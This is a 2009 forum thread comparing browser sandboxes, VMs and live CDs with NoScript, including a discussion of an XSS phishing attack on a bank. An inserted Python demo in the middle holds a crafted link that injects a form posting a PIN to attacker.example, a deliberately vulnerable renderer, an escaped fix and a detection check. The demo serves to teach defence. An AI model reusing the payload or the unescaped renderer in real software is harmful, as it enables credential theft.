Tell me what you think about "sandbox" solutions

General discussion about web technology.
Nan M
Ambassador
Posts: 102
Joined: Thu Mar 19, 2009 12:44 pm

Re: Tell me what you think about "sandbox" solutions

Post by Nan M » Sat Mar 28, 2009 3:20 am

For the plain home user who may be browsing the forum, a session with one of the live Linux distro cds is a good sandbox - and it doesn't take up resources in your main system, or need geek credentials to set up.
Nothing is written to the machine's resident system, so rebooting after removing the live cd leaves no trace of the cd session.

At home here, rather than fuss around with creating and maintaining limited user accounts for them, I give the very young children who visit a session in The Puppy http://www.puppylinux.org/home/overview with a tied-down Seamonkey to play with. Their sessions reside entirely in ram and can be run on that old machine out the back with the sticky hdd that won't matter if it gets food down the fan vent - residual current detectors in place of course.
The older visitors have a choice of live cds from distros such as OpenSUSE and Ubuntu.
These are much easier solutions for a busy auntie than creating and policing limited user accounts on the main systems, and it does give the older kids freedom to download as they want. Which they will always try to do against any restrictions, so I can avoid the cleanups this way.

GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sat Mar 28, 2009 3:43 am

Nan M wrote: For the plain home user who may be browsing the forum, a session with one of the live Linux distro cds is a good sandbox - and it doesn't take up resources in your main system, or need geek credentials to set up.
Nothing is written to the machine's resident system, so rebooting after removing the live cd leaves no trace of the cd session.


Yes, for me Knoppix has been great for this and you can even write to external disks if you wish.

At home here, rather than fuss around with creating and maintaining limited user accounts for them, I give the very young children who visit a session in The Puppy http://www.puppylinux.org/home/overview with a tied-down Seamonkey to play with. Their sessions reside entirely in ram and can be run on that old machine out the back with the sticky hdd that won't matter if it gets food down the fan vent - residual current detectors in place of course.
The older visitors have a choice of live cds from distros such as OpenSUSE and Ubuntu.
These are much easier solutions for a busy auntie than creating and policing limited user accounts on the main systems, and it does give the older kids freedom to download as they want. Which they will always try to do against any restrictions, so I can avoid the cleanups this way.


Nice, creative solution for kids but unfortunately for me, I deal with adults, although sometimes they are much worse than kids.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sat Mar 28, 2009 9:38 am

Giorgio Maone wrote: NoScript (in-browser protection, web app isolation) and sandboxes (browser isolation from the OS) are orthogonal.

Yes, nice complementary right angles, producing defense in depth, or the ability to view a Flash video without fear inside SB. You pwned my sandbox? I just flushed you down the toilet!
Giorgio Maone wrote: I wrote a short post about this some time ago.

I went there. The link to the bank phishing, which did sound scary, is broken. Do you have an updated link?
The "pwn your router" attack still seems impossible with full NS lockdown, as your conclusion said. We're on the same side there.
Giorgio Maone wrote: If I need to test something in IE or Chrome, I use a clean Vista VM. For Safari, a Mac OS X VM.

Tom T. wrote: ... lightweight, low-knowledge solutions (unlike VMware, etc.).
My understanding - please correct me if I'm wrong -- is that VM solutions consume a lot of resources -- essentially running almost a second machine or second OS - and so might not be suitable for those of us who buy at the lower end of the computer scale. Also more knowledge to set up and use, which would apply to Linux, Knoppix, and other solutions mentioned here. I readily admit to being probably the lowest-knowledge user among the frequent posters here, at least as regards coding, programming, etc. (although I've pulled some kinda clever hacks on my own XP :geek: ) But I read a lot, try to learn and remember and expand the knowledge base. I hope to know more next week than I do during the current week. Otherwise, I will be this stupid for the rest of my life. :cry: Anyway, perhaps this helps me to empathize with the average user. Hence my efforts to initiate a Quick Start Beginner Guide to NS, and to promote products like Sandboxie (and NS, of course!) that are ready to use OOB with little or no config, little user interaction, short, quick learning curve. Safety for the masses.

Giorgio Maone wrote: I've heard good things about SandboxIE among my users, but I've never felt the need of trying it out, sorry.

No need to apologize. You are a thousand times as knowledgeable as I and can detect dangers on your own from source code, etc. Steve Gibson, despite preaching security to the masses, admits that he doesn't run AV. Sure, he can smell a virus a mile away. I can read the page source code and pick out a few things, but wouldn't know an XSS or a virus code if I tripped over it. So I trust you and NS to protect me from unsafe scripts, plugins, XSS, clickjack, etc.; I use AV to do individual scans of all d/l's before opening as well as for real-time protection; and I use SB as a backup defense or when scripts/plugins must be allowed, knowing that if some malware does sneak into the sandbox, it cannot write to my Registry, system files, or, for that matter, to my grocery list or to anything else outside the sandbox; and that it is gone forever as soon as the browser is closed.

I know that it can be difficult for experts in any field to empathize with novices. I know this because in the several fields in which I have been paid to teach others, I had a high success rate, <bragging> often higher than the other teachers, some of whom would send me their "failures"</bragging>, by empathizing with the beginner, seeing it from *their* POV rather than mine, and assuming zero-knowledge until demonstrated otherwise.

I'm very grateful to the sw experts who share their tools with me, and, to the extent that I can absorb it, their knowledge. Cheers!

p. s. Since I use NS to block dangerous scripting at user-content sites like this one :P, I discovered just this week a work-around to use the less-commonly-known smileys without enabling the dangerous scripts. Right-click the smiley (sometimes several times, it seems), > Properties, and read "Alternate text". :idea: Then you can type in that text and have the smiley without the scripting. So I know more than I did last week. But of course, all of you have known this trick for years. ;)

therube
Ambassador
Posts: 7406
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Tell me what you think about "sandbox" solutions

Post by therube » Sat Mar 28, 2009 2:31 pm

The link to the bank phishing, which did sound scary, is broken.

LINK: XSS+phishing in Italian bank hack

And a quicker link to your QUICK START, http://forums.mozillazine.org/viewtopic ... 5#p6006015.

PS: on the "by" line, that little box, that is a direct link to the post. That's what I used for the (second) link above. (Mozillazine also included a session id &sid=xxx, which is immaterial & I edited out.)


Post by therube » Sat Mar 28, 2009 9:31 am

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: Tell me what you think about "sandbox" solutions

Post by Alan Baxter » Sat Mar 28, 2009 10:29 pm

Tom T. wrote: I use NS to block dangerous scripting at user-content sites like this one

As far as I know, it's not necessary to block scripting on this site. User content implemented with html isn't allowed.

GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sun Mar 29, 2009 12:39 am

Alan Baxter wrote:
Tom T. wrote: I use NS to block dangerous scripting at user-content sites like this one

As far as I know, it's not necessary to block scripting on this site. User content implemented with html isn't allowed.


Agreed, you are fine here. And even elsewhere, certain things are quite benign.

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sun Mar 29, 2009 3:13 am

therube wrote:
The link to the bank phishing, which did sound scary, is broken.

LINK: XSS+phishing in Italian bank hack

Thanks.
"An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page."
Are they sending the mails to the customers, or to the bank? If to the bank, shame on them for having XSS vuln, but much more shame for opening emails without proper sanitization of content and a little common sense. The two banks I deal with in the US both have secure messaging systems inside the logged-in account, so there is no need for a customer *ever* to send the bank an email through normal channels (just as users are constantly warned never to click on a link in email purporting to be from your bank.) It seems inquiries from potential customers could be sanitized. Or opened in a Sandboxed browser :)

And a quicker link to your QUICK START, http://forums.mozillazine.org/viewtopic ... 5#p6006015.

I *knew* there had to be a direct link to a specific post instead of to a page. I just copied the URL of the page :? . How stupid of me not to realize that that unlabeled, tiny little clear box, which looks almost like a web bug (yes, sometimes they're slightly opaque), was the direct link. (btw, I see only a date/time stamp, not "by", but I found it eventually, d'uh). Also much thanks for tip to cut sid. Now I know more than I did last week, so I can kick back for a week lol.

@ Alan Baxter and GµårÐïåñ:

Do you know of an emoticon (smiley) for "facetious"? Obviously the one I chose didn't convey that successfully. Perhaps "wink" would have been a better choice.
Anyway, I still enjoy figuring out stuff like the smiley work-around (perhaps one day, I'll be at a site that isn't so benign), and yes, I do allow scripting here most of the time, disabling it only for Alan's pm's.

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Clarification of Sandboxie/NoScript relationship

Post by Tom T. » Sun Mar 29, 2009 3:25 am

Tom T. wrote:
Giorgio Maone wrote: NoScript (in-browser protection, web app isolation) and sandboxes (browser isolation from the OS) are orthogonal.

I've had a nagging fear that Giorgio or anyone else might somehow have gotten the impression that I was touting Sandboxie as a substitute or competition for NS. For one, that would be incredibly rude to our host and to this forum -- utter spam, actually. (please note SB is available free as nagware.) For another, why would I then be here, so enthusiastic about NS?
Yes, they are two completely different avenues towards the goal of safe surf. Putting a second lock on your door that is identical to the first lock wouldn't add much safety. Adding a slide bolt would. SB isn't competing or conflicting with NS; it's just the poor man's version of VM, light and easy to use.

I hope neither Giorgio nor anyone else got the wrong idea. Apologies to those who did.

GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sun Mar 29, 2009 3:42 am

Tom, here is my take on stuff and what you said. I hope I got it all right. You are right that the user needs to use some common sense and not use a link provided in the email directly without knowing for sure where it goes. But if say they are stupid and they do it, a sandboxed browser will NOT help them as it's not stealing information actively but rather passively asking the user to provide it, no way to block some bonehead move like that when the user is providing it willingly basically.

I don't think anyone, including Giorgio, has anything against sandboxed solutions or how people use them, just that each does it in their own way. He does it using VM solutions or linux environments with less exploits, I use VM, live linux, and even some sandbox solution for various purposes of developing, testing, security or whatever but not every day or for myself necessarily because I feel that with my use of common sense and careful practices, I am just fine. Knock on wood, no problems all these years, no matter the threats released out there.

I am just always on the lookout for other ways of doing things, other solutions, other perspectives and so on because I love to acquire knowledge for the sake of knowledge sometimes, call it pure research if you will. I have always believed that knowledge is power and why not share that power. Some of it I use personally and incorporate, some of it I pass along to others and some of it just sits in the noggin and collects cobwebs :) Of course I didn't mean to say that you won't find a site that is malicious, I am just saying that this site and some sites are benign, not everyone is out there to get us ;) Sometimes a cigar is just a cigar :lol: But it's good to be prepared for the worst and I always recommend caution, no matter what. After all, it's not paranoia, when everyone IS out to get you :twisted:

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sun Mar 29, 2009 6:36 am

GµårÐïåñ wrote: Tom, here is my take on stuff and what you said. I hope I got it all right. You are right that the user needs to use some common sense and not use a link provided in the email directly without knowing for sure where it goes. But if say they are stupid and they do it, a sandboxed browser will NOT help them as its not stealing information actively but rather passively asking the user to provide it, no way to block some bonehead move like that when the user is providing it willingly basically.

GµårÐïåñ, my good friend, I'm afraid that once again I've been unclear by addressing multiple topics in a single post, a habit I *must* learn to break.

On page 1 of this thread, Giorgio linked to an article of his, which in turn linked to an XSS attack on an Italian bank. I found the link to be broken, so therube kindly provided an updated link. Quoting the actual article,
"An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page."

Now, my question was how sending an email to the bank could cause XSS. For example, go to http://www.wachovia.com, pretending you are a non-customer, and follow the contact links until you find the way to send them a message. If you don't have the time, I'll tell you where you'll end up:

(scroll down)


https://www.wachovia.com/formswachovia/ ... ic_contact

Note that they don't even provide a normal internet email address, e. g., "info@wachovia.com". They direct you to their *own* internal messenger, under their control, and hopefully designed by someone like you or Giorgio instead of the usual idiots. Sure, BadGuy could make up a fake name/email, although I'd expect the bank's bot to make sure the email is a valid one (even if just to check for typos) and return an error if not. If you do get to submit, then certainly you could write malicious code in the box and send it. But I can't see their message-receiving program having access to modify (inject XSS code into) their *secure login page* directly from a form submission, unless they're really stupid, and hopefully by now, everyone knows such inputs should be sanitized. For example, my bank prohibits all keyboard characters in such internal messages except for a very limited set, presumably safe. They don't even allow standard double-quotes " , hyphens - or asterisks * (I assume these are parsing syntax in some languages, most likely SQL?).

If a bank *did* have a standard external mail address, it still seems difficult for me to understand how the email itself could modify the secure login page, although one of my online banks got really pi**ed when I told them to quit sending me HTML-enriched email and stick to plain text. But I don't have a secure login page for them to attack anyway :). So assume the foolish employee clicks the malicious link in this email. First, let us hope s/he is not answering email with admin or root privileges on the bank's entire IT system :o . But my point, and I'm sorry it wasn't clear, is that if the bank permits outside emails, and employees sit there with Windows machines answering them from a sandboxed browser, then any malicious code, even if through a foolish click on a link, is stuck in the sandbox. Right, it is only gathering information. But this attack specifically stated that "...use a specially-crafted URL to inject a modified login form onto the bank's login page." I can't visualize this URL or its payload getting out of the sandboxed email-browser and into the source code of the https login page of the bank. Please explain if/how this is possible. Thanks as usual, my friend.

I'm always afraid that if the post is short, I'm not being clear; or if it's too long, it's boring or hard to understand . Please forgive both.

GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sun Mar 29, 2009 6:59 am

I am sorry Tom, I did understand what you were saying, I just tried to keep my response short and to the point and it seems I failed miserably :lol: A lot of domain hijacking, like what happened with dfs.dell.com not too long ago, is that someone finds a vulnerability in the way their site processes information and finds a way to send a seemingly legitimate link to facilitate an injection that will redirect that information to the "BadGuy" server for harvesting.

I think the best person to do further response on this would be Giorgio himself, as he has a way of explaining things that tends to do the trick. The most common way of "phishing" is that "BadGuy" uses a link that says xyz.com (legitimate domain) while the actual embedded link is to xyz.badguyserver.com (not legitimate), and the users don't catch it in the address bar. Another is to send a link to the legitimate domain xyz.com with a parameter ?badinfo=XXX&inject=redirectcrap or something to that effect which allows them to actually intercept the legitimate site's credential submission and processing and direct it to another site. Later they use that to log in, and do their stuff.

Anyway bud, I am running on about 38 hours of no sleep, no coffee, no breaks and my brain is totally fried, so I will bid you all goodnight as I go attempt to get a few hours before being up again at 6:30 AM. It is now officially midnight :( Hopefully I made some good clarifications and not just muddied the water more.
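The crafted-link pattern GµårÐïåñ describes above (a legitimate domain plus a parameter that ends up in the page), as an added example that is my own code, not code from the thread, the quoted article, or any bank: a login page whose "error" parameter is reflected unescaped beside the escaped fix, plus a log-side check for tag characters in query values. bank.example, attacker.example, the parameter name and the crafted value are all constructed placeholders.

```python
"""Reflected XSS in a login page: the vulnerable renderer beside the escaped fix.

Added example, not code from the thread or from any bank. The URL, parameter
name and crafted value below are constructed for illustration only.
"""
import html
from urllib.parse import parse_qs, urlsplit

LOGIN_URL = "https://bank.example/login"  # constructed placeholder domain

# Constructed crafted link of the kind the quoted article describes: the page
# expects a short message in "error", but the value is HTML that draws a
# second form pointing at a server the site does not control.
CRAFTED_LINK = (
    LOGIN_URL
    + "?error=%3Cform+action%3D%22https%3A%2F%2Fattacker.example%2Fcollect%22%3E"
    + "Session+expired%2C+re-enter+your+PIN+%3Cinput+name%3Dpin%3E%3C%2Fform%3E"
)


def parse_query(url: str) -> dict:
    """Split a URL's query string into {name: [values]} with percent-decoding applied."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def _page(error_html: str) -> str:
    """Shared template: an error slot above the genuine login form."""
    return (
        '<p class="error">' + error_html + "</p>"
        + '<form action="' + LOGIN_URL + '" method="post">'
        + '<input name="user"><input name="pass" type="password"></form>'
    )


def render_login_vulnerable(query: dict) -> str:
    """Reflects the raw parameter, so markup in the URL becomes markup in the page."""
    return _page(query.get("error", [""])[0])


def render_login_fixed(query: dict) -> str:
    """Same template, but the parameter is HTML-escaped before it reaches the page."""
    return _page(html.escape(query.get("error", [""])[0], quote=True))


def form_count(page: str) -> int:
    """Number of <form> elements the browser would see; a login page should have one."""
    return page.count("<form")


def reflected_markup_in_request(url: str) -> bool:
    """Log-side check: flag requests whose query values carry tag characters.

    A request for a displayable message has no '<' or '>' in any value, so
    this is a cheap filter to run over a web server's access log.
    """
    values = (v for vals in parse_query(url).values() for v in vals)
    return any("<" in v or ">" in v for v in values)


if __name__ == "__main__":
    q = parse_query(CRAFTED_LINK)
    print("forms on vulnerable page:", form_count(render_login_vulnerable(q)))  # 2
    print("forms on fixed page:     ", form_count(render_login_fixed(q)))       # 1
    print("request flagged:         ", reflected_markup_in_request(CRAFTED_LINK))
```

The escaped page still shows the attacker's text to the user, but as text inside the error paragraph; only the original form remains, so whatever the user types is posted to bank.example.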

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sun Mar 29, 2009 10:03 am

Get some sleep, Bro. The issue was they were sending the phishing mail TO A BANK, not a user. When you're well-refreshed, I'm sure you'll understand my question and have your usual excellent answer. No rush or need to bother Giorgio -- it was an academic question for my own continuing education, since I'm not a bank. ;)

therube
Ambassador
Posts: 7406
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Tell me what you think about "sandbox" solutions

Post by therube » Sun Mar 29, 2009 5:26 pm

(Perhaps taken out of context, but ...)

As far as I know, it's not necessary to block scripting on this site.
...
you are fine here
...
just saying that this site and some site are benign


I'll disagree.
This site & some sites intend on being benign.
But that does not make them so.

Mozillazine had (has?) an exploit against it.
There is nothing to say that this site does not, or may not in the future.

So blankly accepting some site IMO is wrong.

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: Tell me what you think about "sandbox" solutions

Post by Alan Baxter » Sun Mar 29, 2009 8:27 pm

therube wrote: This site & some sites intend on being benign.
But that does not make them so.

Mozillazine had (has?) an exploit against it.
There is nothing to say that this site does not, or may not in the future.

So blankly accepting some site IMO is wrong.

Are you saying this site has a known vulnerability? (I don't mean known exploit. That would be much more serious.) If that's the case, then certainly Giorgio should be warned about using JavaScript to implement some of its features. I don't like enabling JavaScript on sites with known vulnerabilities. Should he run one of those web site checkers to verify it's not vulnerable?

Same with the MozillaZine forums. If its current implementation of phpBB has a known exploit, please let the rest of us know exactly what it is, so we can take appropriate precautions.

GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Mon Mar 30, 2009 12:40 am

When I said this site is benign and some others too, I was asserting the obvious fact that they are intentionally and in good faith choosing to be as to not harm their users. Anytime you use a technology, even as simple as getting a hosting service on shared virtual server, you are ALWAYS potentially exposed to exploits. That's a given and goes without surprise or much discussion really. All a person can do is be diligent, cautious and use common sense.

Tom, I wish I could say I got some sleep but had too much on my mind and if you can believe it, I was too exhausted to sleep. I ended up getting up at 5, taking a shower, getting dressed and sitting there with a cup of coffee reading over my prep and then I got home just a couple of hours ago, I am so fried still. Plus starting tomorrow, it is going to be one HECK of a killer month for me. I am going to re-read Giorgio's post, re-read my own stuff and your stuff and compose my thoughts offline until it makes sense to me and then post it, how is that? :P
